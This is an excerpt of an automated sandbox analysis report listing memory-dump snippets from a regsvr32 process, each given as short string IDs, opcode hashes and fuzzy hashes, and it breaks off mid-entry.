                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: :d
                                                                                        • API String ID: 0-1981401805
                                                                                        • Opcode ID: 7e01d6742b691afee721fc3f193522d49c245a6ce31efde50cdf5c406c664d98
                                                                                        • Instruction ID: 210e0c3814bb066ec4f0600647a6f8918949d15d236ac433349e910c02a539df
                                                                                        • Opcode Fuzzy Hash: 7e01d6742b691afee721fc3f193522d49c245a6ce31efde50cdf5c406c664d98
                                                                                        • Instruction Fuzzy Hash: 55B1067150560DDFCB88DF28C089ADE7BE0FF58308F825229F80AA7255D774DA98DB49
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 'NL
                                                                                        • API String ID: 0-130891299
                                                                                        • Opcode ID: 8a3ed407222c8cc95b4195594c73c0a0709bd4276b41a18d313f15a757072ddc
                                                                                        • Instruction ID: bb2c5b98f4e45d76fdff147334347c6d164a6d6c8cf2b5048c0250209dce3a22
                                                                                        • Opcode Fuzzy Hash: 8a3ed407222c8cc95b4195594c73c0a0709bd4276b41a18d313f15a757072ddc
                                                                                        • Instruction Fuzzy Hash: 08816770900748CFDB99CF68C4896DE7BF0FB48394F609129F94697261C774D989CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ETz
                                                                                        • API String ID: 0-3877082699
                                                                                        • Opcode ID: a70674ad09814c9e1798ed159b67f00a2b9c82905ce41e3639f5d760caf2f047
                                                                                        • Instruction ID: db1a2cf02a49f3c5a1febdf95057c2803ba9c7043f43a3a74a84a847f8708688
                                                                                        • Opcode Fuzzy Hash: a70674ad09814c9e1798ed159b67f00a2b9c82905ce41e3639f5d760caf2f047
                                                                                        • Instruction Fuzzy Hash: 6281BC34A0674CCBDB65CFA8C0897CDBBF1FF68348F104119E915AA2A6CB70D559CB89
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #;*z
                                                                                        • API String ID: 0-1682342327
                                                                                        • Opcode ID: b680f4a085bd44a123493e5971e743dba8c621f53e8aa86b84bd23ce7ca92522
                                                                                        • Instruction ID: dbf9c55ae058a2f54c24d1eac6a5ff2fe61b468a3017e99be0a6ffbf3af3057b
                                                                                        • Opcode Fuzzy Hash: b680f4a085bd44a123493e5971e743dba8c621f53e8aa86b84bd23ce7ca92522
                                                                                        • Instruction Fuzzy Hash: EF91E0715042888FCBB9DF24D88A7DA7BA1FB45348F50C229D88ECE261DFB0564DDB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: dQ
                                                                                        • API String ID: 0-4190919517
                                                                                        • Opcode ID: 97a4412cc2303f28c05fec1f0b2e1d428cb8767c43294622f9f6b74118afce77
                                                                                        • Instruction ID: 9d729ecabb7b74207a0fd84f221a36cedb2a9a3a0e5d95724699f54aa2ea8075
                                                                                        • Opcode Fuzzy Hash: 97a4412cc2303f28c05fec1f0b2e1d428cb8767c43294622f9f6b74118afce77
                                                                                        • Instruction Fuzzy Hash: 3E71E7711187988BDBFDCF28CC857D97BA6FB44744F20811CE84E8E261DB749A89CB02
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: )0
                                                                                        • API String ID: 0-1029681778
                                                                                        • Opcode ID: 40e7eb8740bf53d50ac0b689975ccfd72f61ab29a6f5010a355cdccaad617979
                                                                                        • Instruction ID: 121df312e681884aeaf9abe1505228ce9ff72d97cb51e4d07d955d8bff2ee376
                                                                                        • Opcode Fuzzy Hash: 40e7eb8740bf53d50ac0b689975ccfd72f61ab29a6f5010a355cdccaad617979
                                                                                        • Instruction Fuzzy Hash: 6851673861660CCBDB69DF78D4852E93BE0FF69344F20402DFC6687266DB34D52A8B58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Uerm
                                                                                        • API String ID: 0-3179360214
                                                                                        • Opcode ID: 9ac54ab8c90a486f4441a78f79c66deafdf79af98abc137c17ed1b11debabc8b
                                                                                        • Instruction ID: 041d59295089493447bb19a8378e04636211af5195b78f50b28b80e802418f55
                                                                                        • Opcode Fuzzy Hash: 9ac54ab8c90a486f4441a78f79c66deafdf79af98abc137c17ed1b11debabc8b
                                                                                        • Instruction Fuzzy Hash: AD6103B190061A8FCF48DFA8C48A5EEBBB1FB58344F10822DE815AB365C7749A55CFD4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: NRx
                                                                                        • API String ID: 0-1393999616
                                                                                        • Opcode ID: b4a4ba5d31bb0dbda5b37bf156645da5abce175ef766aa9e7dc128ab78272a52
                                                                                        • Instruction ID: 7c3eed2061eb3ea8b6bf0d1c70d9a16e0a2e2a77544f255897bb26607a47427d
                                                                                        • Opcode Fuzzy Hash: b4a4ba5d31bb0dbda5b37bf156645da5abce175ef766aa9e7dc128ab78272a52
                                                                                        • Instruction Fuzzy Hash: 46416C706197489BD3E5DF28C08679FBAE0FB88745F90A92DF585C32A1CB74C9488B43
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: {dN
                                                                                        • API String ID: 0-923835543
                                                                                        • Opcode ID: 9e75a9b6c969771d2fbed292b07595da2e1a6dc424cdc2e689696f47c6000392
                                                                                        • Instruction ID: f9e1d774cd1a5aafce577d99eb21246fb33c51757267e19de4f8e3655d4c3e4d
                                                                                        • Opcode Fuzzy Hash: 9e75a9b6c969771d2fbed292b07595da2e1a6dc424cdc2e689696f47c6000392
                                                                                        • Instruction Fuzzy Hash: A24118B091470D8BCF48DFA8C58A1DEBFB1FB483A8F25521DE90AB6250C7749585CF88
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: hT
                                                                                        • API String ID: 0-434349927
                                                                                        • Opcode ID: 6dc475388242e87dfd02804309664708b9ba0169bf98e34e56dbb37a95c1b731
                                                                                        • Instruction ID: 79a86a43dda6c0bf54cad5f70c675ce2074b99fb8c760d3b3e2f6daa19ea02a9
                                                                                        • Opcode Fuzzy Hash: 6dc475388242e87dfd02804309664708b9ba0169bf98e34e56dbb37a95c1b731
                                                                                        • Instruction Fuzzy Hash: 2A5190B190038E8BCB48DF68C88A5DE7BB0FB58308F104A19FC65A6250D7B4D669CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: w.
                                                                                        • API String ID: 0-4252102657
                                                                                        • Opcode ID: 775cc355a8dd2b6f1bc8d8548c4489e17c5a54c9aeae587b6d573d3d7a9b0f7e
                                                                                        • Instruction ID: ff83c9861e3aef96e788ade2e95c5d31a765335f039db5447ff320373d52f62b
                                                                                        • Opcode Fuzzy Hash: 775cc355a8dd2b6f1bc8d8548c4489e17c5a54c9aeae587b6d573d3d7a9b0f7e
                                                                                        • Instruction Fuzzy Hash: 524127B190434A8BCF48DF64C88A4DE7FB1FB58348F10861DEC5AA7250D7749659CBC4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: \>
                                                                                        • API String ID: 0-4115654482
                                                                                        • Opcode ID: ec85be460c7c8dfb7cf3a46c57a1e14dcdd929cba8cf803056f6d038e5aaf727
                                                                                        • Instruction ID: c8bfe62f06df19f0db5cc8e5fd5c20be0a97c60a2c34a345c5b0509f61aa275d
                                                                                        • Opcode Fuzzy Hash: ec85be460c7c8dfb7cf3a46c57a1e14dcdd929cba8cf803056f6d038e5aaf727
                                                                                        • Instruction Fuzzy Hash: 5041B0B490038E8FDB48DF65D8895DE7BB0FB48358F104A1AEC25A6250D7B4D664CFC5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: UfMm
                                                                                        • API String ID: 0-3877223347
                                                                                        • Opcode ID: dec106b4a764423c6080cde6e3c380fc2c4206b9dd3c84e9483206ca750e3b76
                                                                                        • Instruction ID: c77ef5b6f515275834e01b5fcfcfc22ffe1a93dbca634ff8363d49e0f941db2a
                                                                                        • Opcode Fuzzy Hash: dec106b4a764423c6080cde6e3c380fc2c4206b9dd3c84e9483206ca750e3b76
                                                                                        • Instruction Fuzzy Hash: A1519EB190474E8BCF49CF64C48A5DE7FB0FB68398F214219E85A96250D3B8D6A4CFC5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ^I%
                                                                                        • API String ID: 0-4091345571
                                                                                        • Opcode ID: 3f12ff418f07ff0dffb22bdd7eb3939b0fd24fdb2c19c7287af7d17ae91e7243
                                                                                        • Instruction ID: 24279a7f0b8a810ed47d94a020ccddcda864278dcc3d62ea9a1aafd37f1cc870
                                                                                        • Opcode Fuzzy Hash: 3f12ff418f07ff0dffb22bdd7eb3939b0fd24fdb2c19c7287af7d17ae91e7243
                                                                                        • Instruction Fuzzy Hash: D641C2B090074E8BCB48DF68C58A4DE7FF0FB68398F204219EC16A6250D3B496A4CFD4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: E
                                                                                        • API String ID: 0-4189953480
                                                                                        • Opcode ID: 6b2582ab6db5c886dc2d719d00820c997d2b994a7b2935478f04cfa12a5363ce
                                                                                        • Instruction ID: 97bb68eb89739962e45bd832e2874dcd633b22f5609a7b84b761109d701c7c23
                                                                                        • Opcode Fuzzy Hash: 6b2582ab6db5c886dc2d719d00820c997d2b994a7b2935478f04cfa12a5363ce
                                                                                        • Instruction Fuzzy Hash: B341D5B491038E8FCF88DF69D8495DE7BB0FB18358F104A19EC2AA6250D3B49664CF85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: JLq
                                                                                        • API String ID: 0-4186083495
                                                                                        • Opcode ID: 8d9a50e123908ca919991315c6f3e14c53aa3b8bc44063858183d3498e4e8681
                                                                                        • Instruction ID: 27128c2ca0a5d288d3179379bf0eddb2aee49c7a11679c2610c242e98f2fdc84
                                                                                        • Opcode Fuzzy Hash: 8d9a50e123908ca919991315c6f3e14c53aa3b8bc44063858183d3498e4e8681
                                                                                        • Instruction Fuzzy Hash: 3C41D5B090064E8FDF48CF68C4865EE7BF1FB58358F114229E846AA254C7789A95CFD4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: vYa-
                                                                                        • API String ID: 0-893662192
                                                                                        • Opcode ID: 035fd408088c0482a5a9e27521314a342b14366a032dbf1fe9b8c33d69753ec7
                                                                                        • Instruction ID: ed719b7027dd4d7706803f37edca27847d3dc95415a6febebb675a1e15796353
                                                                                        • Opcode Fuzzy Hash: 035fd408088c0482a5a9e27521314a342b14366a032dbf1fe9b8c33d69753ec7
                                                                                        • Instruction Fuzzy Hash: 0741C0B090034E8FCF48CF64D88A5DE7FB0FB68398F104619E856A6250D7B896A5CFC5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: < dA
                                                                                        • API String ID: 0-2747138368
                                                                                        • Opcode ID: 207b38533736b510735db2aca9d27c508cf70737fe24697ea278d93009114e66
                                                                                        • Instruction ID: 677e9d37894352eedc94dfbe70e1d5a5f16f85bbcaa69aa355918790c22682b0
                                                                                        • Opcode Fuzzy Hash: 207b38533736b510735db2aca9d27c508cf70737fe24697ea278d93009114e66
                                                                                        • Instruction Fuzzy Hash: 2741A0B180074E8FCB49CF64D48A4DE7FB0FB68388F204619E856A6254D7B496A8CFD5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: w.
                                                                                        • API String ID: 0-4252102657
                                                                                        • Opcode ID: 8dc8ab0dff87e9b75af9bc87b01f2b240cfc8c73fd94611f7c31912defe47775
                                                                                        • Instruction ID: 9835b62cc5c81bb08ffa4c0ed138b56601e81b85f9b16a4ced47218125f66503
                                                                                        • Opcode Fuzzy Hash: 8dc8ab0dff87e9b75af9bc87b01f2b240cfc8c73fd94611f7c31912defe47775
                                                                                        • Instruction Fuzzy Hash: FC41E4B090434A8BCF48DF64C88A4DE7FB1FB58348F11861DEC5AA6250D7B496A9CFC5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: }]T*
                                                                                        • API String ID: 0-3642313528
                                                                                        • Opcode ID: 7849323620c58637c1544052bb138ebef222585afcb74db7dd86457f284b6379
                                                                                        • Instruction ID: a9b4d124700f7192ec0ffbe58db6f2cedd89af67995077d1789eaf9c0a4fefb8
                                                                                        • Opcode Fuzzy Hash: 7849323620c58637c1544052bb138ebef222585afcb74db7dd86457f284b6379
                                                                                        • Instruction Fuzzy Hash: 624191B191074E9FCF48DF64D48A4DE7FB0FB68388F214619E816A6210D3B496A4CFD5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: w.
                                                                                        • API String ID: 0-4252102657
                                                                                        • Opcode ID: da61243a15702063775777e79984a8309a15a56a41d8ca6f71a856d03373fb1d
                                                                                        • Instruction ID: 13a44cd4838b071505596f301d9460f32b91f3f909068c68e30d7ec81fe075ae
                                                                                        • Opcode Fuzzy Hash: da61243a15702063775777e79984a8309a15a56a41d8ca6f71a856d03373fb1d
                                                                                        • Instruction Fuzzy Hash: 194104B090434A8BCF48CF64C88A4DE7FB1FB58348F10861DEC5AA6250D7B496A8CFC4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: N8$
                                                                                        • API String ID: 0-2933465586
                                                                                        • Opcode ID: 0eb94b4c30cdf64432c8dd49aa40656dc32a215d341cf791ffb885c3adf2427e
                                                                                        • Instruction ID: 297b3d980fd839d27da657b87e2df8633a1b9c783a0b67fb1012bddc2283f9fe
                                                                                        • Opcode Fuzzy Hash: 0eb94b4c30cdf64432c8dd49aa40656dc32a215d341cf791ffb885c3adf2427e
                                                                                        • Instruction Fuzzy Hash: 0241827180078E8FCB45CF64D88A4CE7FB0FB18358F105A19F865A7260D3B49664CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: wk
                                                                                        • API String ID: 0-1447520534
                                                                                        • Opcode ID: 0a0edc96079985f20ed57ef59bebf533c7b67d56244039d22a088e51808c84b4
                                                                                        • Instruction ID: ed1e7f9bc21f483ed76e74f249cc539d96e15df8e9c5d2752f3a18cd8a4680c8
                                                                                        • Opcode Fuzzy Hash: 0a0edc96079985f20ed57ef59bebf533c7b67d56244039d22a088e51808c84b4
                                                                                        • Instruction Fuzzy Hash: A041C4B180074E8BCB48DF68D48A4CE7FF0FB68398F10461DE859A6250D7B49AA4CFD5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: D7
                                                                                        • API String ID: 0-599489778
                                                                                        • Opcode ID: 0decf5b59288eb500aae667ac6c9b4e4dce6b838f673c5fc17c927a6ca0452b7
                                                                                        • Instruction ID: 9ff7da26f915c3fd9b9081bc776a27ba1207aebd425a4d5bef8b93ab939ca450
                                                                                        • Opcode Fuzzy Hash: 0decf5b59288eb500aae667ac6c9b4e4dce6b838f673c5fc17c927a6ca0452b7
                                                                                        • Instruction Fuzzy Hash: 4541B0B090074E8BCF48DF68D4965DE7FB0FB68388F20421DE816A6250D7B496A5CFD5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -
                                                                                        • API String ID: 0-2547686586
                                                                                        • Opcode ID: 39f87b108b025f322a4fb09bf0250602f0777b0869fb0748bb25e5d88246fb72
                                                                                        • Instruction ID: fb4667ec304b728e9739446c3b2210f9efd75ae712771165d94948b9d3b69a1a
                                                                                        • Opcode Fuzzy Hash: 39f87b108b025f322a4fb09bf0250602f0777b0869fb0748bb25e5d88246fb72
                                                                                        • Instruction Fuzzy Hash: E641D2B181038ECFCB48CFA4D88A5CE7BB1FB48358F115A09FC65A6224D3B49665CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Q
                                                                                        • API String ID: 0-2885194100
                                                                                        • Opcode ID: bdb98b8b2c0f07edeaa2617f1c602c347d51b8d3ebd884f46db44bb476cabbd3
                                                                                        • Instruction ID: a9705b719f6d6278401c973a571993bf085652b79919a3d293b183e1acac7421
                                                                                        • Opcode Fuzzy Hash: bdb98b8b2c0f07edeaa2617f1c602c347d51b8d3ebd884f46db44bb476cabbd3
                                                                                        • Instruction Fuzzy Hash: 9141F5B180434E8FCF48CFA4C84A4DE7FB1FB18318F004619EC5AA6250D7B49664CF85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: UA;k
                                                                                        • API String ID: 0-1243451539
                                                                                        • Opcode ID: 9dbe3c72688dc078ed354c07d057a6794037f82480b8e2a0bdd9448b7935877c
                                                                                        • Instruction ID: 446a4ee04f98266578c7fdeec7750357e9914a8a062f983f2ae732e753f3f9f0
                                                                                        • Opcode Fuzzy Hash: 9dbe3c72688dc078ed354c07d057a6794037f82480b8e2a0bdd9448b7935877c
                                                                                        • Instruction Fuzzy Hash: AC31E2B090034E8FCB48DF65C48A4DE7FB0FB68398F104619E859A6250D3B896A5CFC5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: BHj
                                                                                        • API String ID: 0-429444599
                                                                                        • Opcode ID: b2d81b77ec5a3d92ed60f1e2a925d42953c8b0d81e9e004bfe4218ede8c6c85b
                                                                                        • Instruction ID: 88d82d5a62f7e83910e755dc00f06a4804c179e3d48da98a41081325a3075538
                                                                                        • Opcode Fuzzy Hash: b2d81b77ec5a3d92ed60f1e2a925d42953c8b0d81e9e004bfe4218ede8c6c85b
                                                                                        • Instruction Fuzzy Hash: 2F31B2B190078E8FCF84DF64C88A5DE7BB0FB58358F010A09E869A6250D7B8D665CF85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: h
                                                                                        • API String ID: 0-130632579
                                                                                        • Opcode ID: d5fc1072884fae1f5b57c471a7f51524b23a4deaf3d031234e0c0be062cfd6f2
                                                                                        • Instruction ID: cf3c4ac770fe2f70a1efbbc55b0bf253fcb3f834dda7a796d3e0b8f6df5914ba
                                                                                        • Opcode Fuzzy Hash: d5fc1072884fae1f5b57c471a7f51524b23a4deaf3d031234e0c0be062cfd6f2
                                                                                        • Instruction Fuzzy Hash: 803102705187C48BD789CFA8C48965EFBE1FB94384F50492DF486867A0C7F8D948CB86
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ?%4
                                                                                        • API String ID: 0-422666221
                                                                                        • Opcode ID: 9a50b58e01a5729271d6177eeb6adb68723f1c473c55e35b3503dad5704e2603
